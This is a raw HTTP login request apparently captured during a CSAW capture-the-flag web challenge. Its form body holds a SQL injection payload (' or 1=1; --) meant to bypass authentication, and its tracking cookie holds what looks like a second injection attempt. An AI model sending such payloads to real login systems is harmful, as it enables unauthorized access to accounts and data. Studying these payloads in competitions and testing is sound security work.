POST /login HTTP/1.1
Host: web.csaw.io:5800
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://web.csaw.io:5800
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Set-Cookie: session=eyJlbWFpbCI6IkVycm9yIiwidHJhY2tpbmdJRCI6bnVsbH0.ZQXbnw.tNlSB5FEXReF0PLkzJsAIOC1yZs; 
Cookie: trackingID=' 1=1; email="meow"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://web.csaw.io:5800/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

email='+or+1%3d1%3b+--&password=password